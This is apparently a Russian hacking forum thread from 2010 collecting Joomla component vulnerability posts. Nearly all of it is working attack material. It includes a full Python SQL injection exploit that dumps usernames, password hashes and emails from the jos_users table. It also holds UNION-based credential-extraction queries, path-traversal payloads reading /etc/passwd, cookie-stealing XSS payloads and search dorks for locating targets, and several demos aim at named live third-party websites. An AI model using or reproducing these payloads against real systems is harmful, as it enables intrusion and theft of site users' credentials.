    [x] Bug: XSS on Component Jombib
    [x] Example: http://www.site.com/index.php?option=com_jombib=[XSS]
    [x] Demo: http://www.lec.df.uba.ar/index.php?option=com_jombib=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_hotproperty XSS Vulnerability
    Код:
    [x] Joomla Component Hotproperty
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: XSS on Component Hotproperty
    [x] Example: http://www.site.com/index.php?option=com_hotproperty=[XSS]
    [x] Demo:http://www.montblanc-retreats.com/index.php?option=com_hotproperty=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_bookmarks XSS Vulnerability
    Код:
    [x] Joomla Component  Bookmarks
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: XSS on Component Bookmarks
    [x] Example: http://www.site.com/index.php?option=com_bookmarks=[XSS]
    [x] Demo:http://www.movinganthropology.de/index.php?option=com_bookmarks=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_zelig SQL Injection Vulnerability
    Код:
    [x] Joomla Component  Zelig
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team: Fatal Error
    [x] Bug: Sql Injection on Component Zelig (id)
    [x] Example: http://www.site.com/index.php?option=com_zelig&amp;view=person&amp;id=[Sql Injection]
    [x] Demo:http://www.zeligfilm.it/index.php?o...8,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
    [x] Made in Brazil
    Joomla Component com_product XSS Vulnerability
    Код:
    [x] Joomla Component Product
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Product
    [x] Example: http://www.site.com/index.php?option=com_product=[XSS]
    [x] Demo: http://www.breastcancercampaign.org/index.php?option=com_product=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    
    Joomla Component com_imoti XSS Vulnerability
    Код:
    [x] Joomla Component Imoti
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Imoti
    [x] Example: http://www.site.com/index.php?option=com_imoti=[XSS]
    [x] Demo: http://www.bulgarian1stlineproperties.com/index.php?option=com_imoti=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_extcalendar XSS Vulnerability
    Код:
    [x] Joomla Component Extcalendar
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Extcalendar
    [x] Example: http://www.site.com/index.php?option=com_extcalendar=[XSS]
    [x] Demo:http://www.ctsalsa.com/cms/index.php?option=com_extcalendar=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_mosforms XSS Vulnerability
    Код:
    [x] Joomla Component Mosforms
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Mosforms
    [x] Example: http://www.site.com/index.php?option=com_mosforms=[XSS]
    [x] Demo: http://www.euskaletxeak.net/index.php?option=com_mosforms=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    Joomla Component com_comprofiler XSS Vulnerability
    Код:
    [x] Joomla Component Comprofiler
    [x] Author: s4r4d0
    [x] Contact: s4r4d0@yahoo.com
    [x] Team; Fatal Error
    [x] Bug: XSS on Component Comprofiler
    [x] Example: http://www.site.com/index.php?option=com_comprofiler=[XSS]
    [x] Demo: http://www.euskaletxeak.net/index.php?option=com_comprofiler=">><marquee><h1>XSS By Fatal Error</h1><marquee>
    [x] Made in Brazil
    еще дырка в компоненте
    Joomla com_qpersonel SQL Injection Exploit
    Код:
    #!/usr/bin/python
    
    # Joomla com_qpersonel SQL Injection Remote Exploit
    # Version 1.0 (23th May 2010 (public release)
    # By Valentin Hoebel (valentin@xenuser.org)
    # ASCII FOR BREAKFAST
    #
    # EXPLOIT BASED ON MY COLUMN FUZZER
    # Fuzzer was enhanced so it serves as a Joomla Exploiter template
    #
    # ------------------------------------------------------------------------
    # Exploits the SQL injection vulnerability I discovered
    # on 13th April 2010.
    #
    # Copy, modify, distribute and share the code as you like!
    # Warning: I am not responsible for any damage you might cause!
    # Exploit written for educational purposes only.
    
    import sys,  re,  urllib,  urllib2,  string
    from urllib2 import Request, urlopen, URLError, HTTPError
    
    # Define the max. amounts for trying
    max_columns = 100
    
    # Prints usage
    def print_usage():
        print ""
        print "================================================================================="
        print " Joomla com_qpersonel SQL Injection Remote Exploit"
        print " by Valentin Hoebel (valentin@xenuser.org)"
        print ""
        print " Vulnerable URL example:"
        print " http://target/index.php?option=com_qpersonel&task=qpListele&katid=1"
        print ""
        print " Usage:"
        print "         -u <URL> (e.g. -u \"http://target/index.php?option=com_qpersonel&task=qpListele&katid=1\")"
        print "         --help   (displays this text)"
        print ""
        print " Read the source code if you want to know more about this vulnerability."
        print " For educational purposes only! I am not responsible if you cause any damage!"
        print ""
        print "================================================================================="
        print ""
        print ""
        return
    
    #Prints banner
    def print_banner():
        print ""
        print "================================================================================="
        print ""
        print " Joomla com_qpersonel SQL Injection Remote Exploit"
        print " by Valentin Hoebel (valentin@xenuser.org)"
        print ""
        print " For educational purposes only! I am not responsible if you cause any damage!"
        print ""
        print "================================================================================="
        print ""
        return
    
    # Testing if URL is reachable, with error handling
    def test_url():
        print ">> Checking if connection can be established..."
        try:
            response = urllib2.urlopen(provided_url)
            
        except HTTPError,  e:
            print ">> The connection could not be established."
            print ">> Error code: ",  e.code
            print ">> Exiting now!"
            print ""
            sys.exit(1)
        except URLError,  e:
            print ">> The connection could not be established."
            print ">> Reason: ",  e.reason
            print ">> Exiting now!"
            print ""
            sys.exit(1)
        else:
            valid_target = 1
            print ">> Connected to target! URL seems to be valid."
            print ""
        return
    
    # Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities
    def find_columns():
        # Define some important variables and make the script a little bit dynamic
        number_of_columns = 1
        column_finder_url_string = "+AND+1=2+UNION+SELECT+"
        column_finder_url_message = "0x503077337220743020743368206330777321"
        column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
        column_finder_url_terminator = "+from+jos_users--"
        next_column = ","
        column_finder_url_sample = "group_concat(0x503077337220743020743368206330777321,name,username,password,email,usertype,0x503077337220743020743368206330777321)"
        
        # Craft the final URL to check
        final_check_url = provided_url+column_finder_url_string+column_finder_url_message 
        print ">> Trying to find the correct number of columns..."
        
        for x in xrange(1, max_columns):
            # Visit website and store response source code of site
            final_check_url2 = final_check_url+column_finder_url_terminator 
            response = urllib2.urlopen(final_check_url2)
            html = response.read()
            find_our_injected_string = re.findall(column_finder_url_message_plain, html)
            
            # When the correct amount was found we display the information and exit
            if len(find_our_injected_string) != 0:
                print ">> Correct number of columns found!"
                print ">> Amount: ",  number_of_columns
                       
                # Craft our exploit query
                malicious_query =  string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
                print ""      
                print ">> Trying to fetch the first user of the Joomla user table..."
    
                # Receive the first user of the Joomla user table
                response = urllib2.urlopen(malicious_query)
                html = response.read()
                get_secret_data = string.find(html,  "P0w3r t0 t3h c0ws!")
                get_secret_data += 18
                new_html = html[get_secret_data :]
                new_get_secret_data = string.find(new_html,  "P0w3r t0 t3h c0ws!")
                new_html_2 = new_html[:new_get_secret_data]
                print "name, username, password, e-mail address and user status are shown"
                print new_html_2
                print ""
                
                # Offer to display all entries of the Joomla user table
                user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) "))
                if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
                    print ""
                    print "-------------------------------------------------------------"
                    print new_html 
                    print "-------------------------------------------------------------"
                    print "The seperator for the single entries is: ",  column_finder_url_message_plain
                    print "Bye!"
                    print ""
                    print ""
                    sys.exit(1)
                else:
                    print "Bye!"
                    print ""
                    print ""
                    sys.exit(1)
            
            # Increment counter var by one
            number_of_columns  += 1
            
            #Add a new column to the URL
            final_check_url += next_column
            final_check_url += column_finder_url_message         
         
        # If fuzzing is not successfull print this message 
        print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"
        print "Bye!"
        print ""
        print ""
        
    
    # Checking if argument was provided
    if len(sys.argv) <=1:
        print_usage()
        sys.exit(1)
        
    for arg in sys.argv:
        # Checking if help was called
        if arg == "--help":
            print_usage()
            sys.exit(1)
        
        # Checking if  URL was provided, if yes -> go!
        if arg == "-u":
            provided_url = sys.argv[2]
            print_banner()
            
            # At first we test if we can actually reach the provided URL
            test_url()
            
            # Now start with finding the correct amount of columns
            find_columns()
        
    ### EOF ###
    
     
    Последнее редактирование: 24 май 2010
    19 май 2010
    3 пользователям это понравилось.
  13. Nosaer
    Nosaer Модератор
    Симпатии:
    15
    Компоненты

    Joomla JE Job
    Код:
    Example URI = index.php?option=com_jejob&view=../../../../../../etc/passwd%00
    JE Ajax Event Calendar
    Код:
    Example URI = index.php?option=com_jeajaxeventcalendar&view=../../../../../../etc/passwd%00
    3D user cloud
    Код:
    http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    Код:
    http://site/modules/mod_democbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
    http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
     
    1 июн 2010
    1 человеку нравится это.
  14. EXploit
    EXploit Продвинутый
    Симпатии:
    50
    Joomla Component com_sar_news SQL Injection Vulnerability
    Код:
    # Exploit Title: Joomla com_sar_news SQL Injection vulnerability
    # Date: 02 juni 2010
    # Author: LyNx (syntax3rror@ymail.com)
    # Platform / Tested on: Windows XP 2
    # category: webapps/0day
    # Code :
     
    ==== SQLI EXPLOIT ====
    /**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
     
    ==== VULN IN HERE ====
     
    http://localhost/joomla/index.php?option=com_sar_news&id=80[c0de]&sort_by=ordering
     
     
    ==== LIVE DEMO ====
     
    http://localhost/joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering
     
    [x]-------------------------------------------------------------------
    Thanks To :
    system_rt0, bobyhikaru, kamtiEz, r3m1ck, otong, bumble_be, anharku,
    virgi, ranggamaggic, shadowsmaker
    suddent_death, pl4nkt0n, pokeng, demnas, Xr0b0t, all crew indonesia
    hacker and all outsider...
     
    [x]-------------------------------------------------------------------
    [x] www.indonesianhacker.or.id
    [x] kuat kita bersinar
    [x]-------------------------------------------------------------------
    Joomla Component com_chronocontact SQL Injection Vulnerability
    Код:
    # Exploit Title: Joomla Component ChronoForms (com_chronocontact)
    # Date: 01, June 2010
    # Author:  _mlk_ (Renan)
    # Software Link:0
    # Version: 0
    # Tested on: all OS
    # CVE : 0
    # Code : here
     
    Joomla Component ChronoForms (com_chronocontact) - Blind SQL Injection Vulnerability
     
    ###################################################################################################################################
     
     
       [!] Discovered by : _mlk_ (Renan)
     
       [!] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
     
       [!] Homepages :  http://code.google.com/p/bugsec/  <>  http://botecounix.com.br/blog/  <>  http://c0d3rs.wordpress.com/
     
       [!] Location : Porto Alegre - RS, Brasil
                             (or Brazil)
     
    ###################################################################################################################################
     
     
          [-] Information
     
       [?] Script : ChronoForms for Joomla 1.5
     
       [?] Vendor :  http://www.chronoengine.com/
     
       [?] Dork/String :  "index.php?option=com_chronocontact" / "com_chronocontact"
     
       [?] Download : http://www.chronoengine.com/downloads/9-chronoforms.html
     
       [?] Date :  01, June 2010
     
     
    ###################################################################################################################################
     
     
          [*] Example :
     
             http://localhost/index.php?option=com_chronocontact&itemid=1 [Blind-SQL]
             http://localhost/[PATH]/index.php?option=com_chronocontact&itemid=1 [Blind-SQL]
     
     
    ###################################################################################################################################
     
     
        [~] Agradecimentos :
     
            Deus , Familiares , Amigos e Tricolor Ga?cho (Gr?mio) .
     
     
    ###################################################################################################################################
    Joomla Component com_chronoconnectivity SQL Injection Vulnerability
    Код:
    # Exploit Title: Joomla Component ChronoConnectivity
    # Date: 01, June 2010
    # Author:  _mlk_ (Renan)
    # Software Link: http://bugsec.googlecode.com/files/joomla_chronoconnectivity.zip
    # Version: 0
    # Tested on: all OS
    # CVE : 0
    # Code : here
     
    Joomla Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Vulnerability
     
    ###################################################################################################################################
     
     
       [!] Discovered by : _mlk_ (Renan)
     
       [!] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
     
       [!] Homepages :  http://code.google.com/p/bugsec/  <>  http://botecounix.com.br/blog/  <>  http://c0d3rs.wordpress.com/
     
       [!] Location : Porto Alegre - RS, Brasil
                             (or Brazil)
     
    ###################################################################################################################################
     
     
          [-] Information
     
       [?] Script : ChronoConnectivity for Joomla 1.5
     
       [?] Vendor :  http://www.chronoengine.com/
     
       [?] Dork/String :  "index.php?option=com_chronoconnectivity" / "com_chronoconnectivity"
     
       [?] Download : http://www.chronoengine.com/downloads/7-chronoconnectivity.html
     
       [?] Date :  01, June 2010
     
     
    ###################################################################################################################################
     
     
          [*] Example :
     
             http://localhost/index.php?option=com_chronoconnectivity&itemid=1 [Blind-SQL]
             http://localhost/[PATH]/index.php?option=com_chronoconnectivity&itemid=1 [Blind-SQL]
     
     
    ###################################################################################################################################
     
     
        [~] Agradecimentos :
     
            Deus , Familiares , Amigos e Tricolor Ga?cho (Gr?mio) .
     
     
    ###################################################################################################################################
    _http://inj3ct0r.com/​
     
    2 июн 2010
    1 человеку нравится это.
  15. EXploit
    EXploit Продвинутый
    Симпатии:
    50
    Еще пачка дырок в компонентах joomla

    Joomla Component com_cinema SQL Injection Vulnerability
    Код:
    # Exploit Title: joomla component cinema SQL injection Vulnerability
    # Date: 09 juny 2010
    # Author: Sudden_death (suddendeath404@yahoo.com)
    # Software Link: N/A
    # Tested on: Windows XP 2
    # Platform / Tested on: Windows XP 2 SP 2
    # myweb  : http://sudden.isgreat.org/
    # dork   : inurl:option=com_cinema
    
    ======================================================================
     
    # EXPLOIT / c0de
    
    -99999 /**/ union /**/ select /**/ 0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password) /**/ from /**/ jos_users--
     
    # VULN IN HERE
     
    http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=[exploit]
      
    # LIVE DEMO
     
    http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=deta%20il&id=-99999 /**/ union /**/ select /**/ 0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,%2019,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password) /**/ from /**/ jos_users--
      
    [#]-------------------------------------------------------------------
     
    GREETZ TO WE FORUM:
    -=-[ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org ]-=-
     
    [#]-------------------------------------------------------------------
     
    MY BROTHA :
    | bumble_be | Mr.SoOofe | BobyPutrA | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito |
    | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip |
    | angga | demnas | ELV1N4 | hateback | virgi | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | z0mb13 | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 |
    | r4tu_le64h | huda_style | ranggamagic | maximize13 | and you |
    [#]-------------------------------------------------------------------
     
    note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan!
    Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
    Код:
    Name : Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
    Date : june, 9 2010
    Vendor url :http://jforjoomla.com/
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla 1.5 Jreservation Component for hotel booking system.
    Jreservation is a specially designed component for hotel owners who provides lodging facility & online booking for the rooms like deluxe, Air
    
    conditioned, Non Air conditioned. By using this Joomla 1.5 Jreservation component you can add multiple room types, amenity types like room
    
    amenity or property amenity. Amenity are like additional services which the hotel owner provides with the room e.g. Telephone, internet
    
    connection, cable connection and property amenity like swimming pool, gym, etc. With the help of a calender the user or a customer of the
    
    hotel can check rooms availability also book room as a provisional booking.
    
    Features of Joomla 1.5 Jreservation component :-
    1.Native Joomla 1.5
    2.Multiple properties are supported.
    2.Admin can add / edit rooms/ room types
    3 Admin can add / edit rooms/ rooms.
    4.Admin can add / edit room amenities/ Property amenities.
    5.Detailed search for user to search for available rooms.
    4.Hotel owner can show hotel images in a slideshow.
    5.Owner can upload multiple images to the admin.
    6.Owner can add multiple rooms,room type, room rent in an easy way.
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO  URL:
    
           http://jforjoomla.com/cd-hotel/Property-Cpanel.html?pid=[SQLi]
    
    ###############################################################################################################
    
    Xploit: XSS Vulnerability
    
    DEMO URL :
    
        http://jforjoomla.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla com_jsubscription SQL Injection Vulnerability
    Код:
    Name : Joomla com_jsubscription SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jsubscription from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jsubscription&controller=subscription&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jmarket SQL Injection Vulnerability
    Код:
    Name : Joomla com_jmarket SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jmarket
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jmarket from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jmarket&controller=product&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jcommunity SQL Injection Vulnerability
    Код:
    Name : Joomla com_jcommunity SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jcommunity
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jcommunity from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jcommunity&controller=members&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jtickets SQL Injection Vulnerability
    Код:
    Name : Joomla com_jtickets SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jtickets
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    #######################################################################################################
    
    ########
    Description:
    
    Joomla com_jtickets from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################
    
    ########
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jtickets&controller=ticket&task=[sqli]
    
    #######################################################################################################
    
    ########
    # 0day no more
    # Sid3^effects
    
    Joomla Component com_jstore SQL Injection Vulnerability
    Код:
    Name : Joomla com_jstore SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jstore
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    #######################################################################################################
    
    ########
    Description:
    
    Joomla com_jstore from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################
    
    ########
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jstore&controller=product-display&task=[sqli]
    
    #######################################################################################################
    
    ########
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jnewsletter SQL Injection Vulnerability
    Код:
    Name : Joomla com_jnewsletter SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jnewsletter
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jnewsletter from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jstore&controller=product-display&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Components com_jlinks SQL Injection Vulnerability
    Код:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_jlinks SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_jlinks&Itemid=[sqli]
    
    # 0day n0 m0re #
    
    Joomla Components com_jbounceback SQL Injection Vulnerability
    Код:
    Exploit Title:Joomla com_jbounceback SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    Joomla com_jbounceback from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_jbounceback&Itemid=[sqli]
    
    Joomla Components com_jiptracker SQL Injection Vulnerability
    Код:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_jiptracker SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    Joomla com_jiptracker from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_jiptracker&Itemid=[sqli]
    
    # 0day n0 m0re #
    
    Joomla Components com_rsgallery SQL Injection Vulnerability
    Код:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_rsgallery SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    Description:
    
    ?Joomla com_rsgallery from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_rsgallery2&amp;Itemid=[sqli]
    
    # 0day n0 m0re #
    Joomla Components com_content SQL Injection Vulnerability
    Код:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_content SQL Injection Vulnerability
    Vendor url:http://jforjoomla.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    ?Joomla com_content from jforjoomla suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://jforjoomla.com/cd-hotel/index.php?option=com_content&view=article&id=[sqli]
    
    # 0day n0 m0re #
    (c) httр://inj3сt0r.соm/​
     
    Последнее редактирование: 10 июн 2010
    10 июн 2010
  16. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    241
    Joomla Component com_jsupport SQLi and XSS

    SQLi:
    Код:
    # Exploit Title: Joomla Component com_jsupport SQL Injection Vulnerability
    # Date: 12.11.2010
    # Author: Valentin
    # Category: webapps/0day
    # Version: 1.5.6
    
    # Tested on:
    # CVE :  
    # Code : 
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
    >> General Information 
    Advisory/Exploit Title = Joomla Component com_jsupport SQL Injection Vulnerability
    Author = Valentin Hoebel
    Contact = valentin@xenuser.org
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
    >> Product information
    Name = JSupport
    Vendor = Extension Depot
    Vendor Website = http://www.extensiondepot.com/extensions/jsupport.html
    Affected Version(s) = 1.5.6
    
     
    [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
    >> SQL Injection
    This vulnerability can be found by viewing the component in the Joomla administrator
    backend.
    
    Examples:
    administrator/index.php?option=com_jsupport&task=listTickets&alpha=[SQL Injection]
    administrator/index.php?option=com_jsupport&task=listFaqs&alpha=[SQL Injection]
    
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
    >> Additional Information
    Advisory/Exploit Published = 12.11.2010
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
    >> Misc
    Greetz = cr4wl3r, JosS, packetstormsecurity.org, exploit-db.com
    
    
    [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
    XSS:
    Код:
    # Exploit Title: Joomla Component com_jsupport Critical XSS Vulnerability
    # Date: 12.11.2010
    # Author: Valentin
    # Category: webapps/0day
    # Version: 1.5.6
    
    # Tested on:
    # CVE :  
    # Code : 
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
    >> General Information 
    Advisory/Exploit Title = Joomla Component com_jsupport Critical XSS Vulnerability
    Author = Valentin Hoebel
    Contact = valentin@xenuser.org
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
    >> Product information
    Name = JSupport
    Vendor = Extension Depot
    Vendor Website = http://www.extensiondepot.com/extensions/jsupport.html
    Affected Version(s) = 1.5.6
    
     
    [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
    >> Critical XSS Vulnerability
    The component allows you to create and submit tickets. The tickets can be viewed
    on the website and in the admin panel.
    
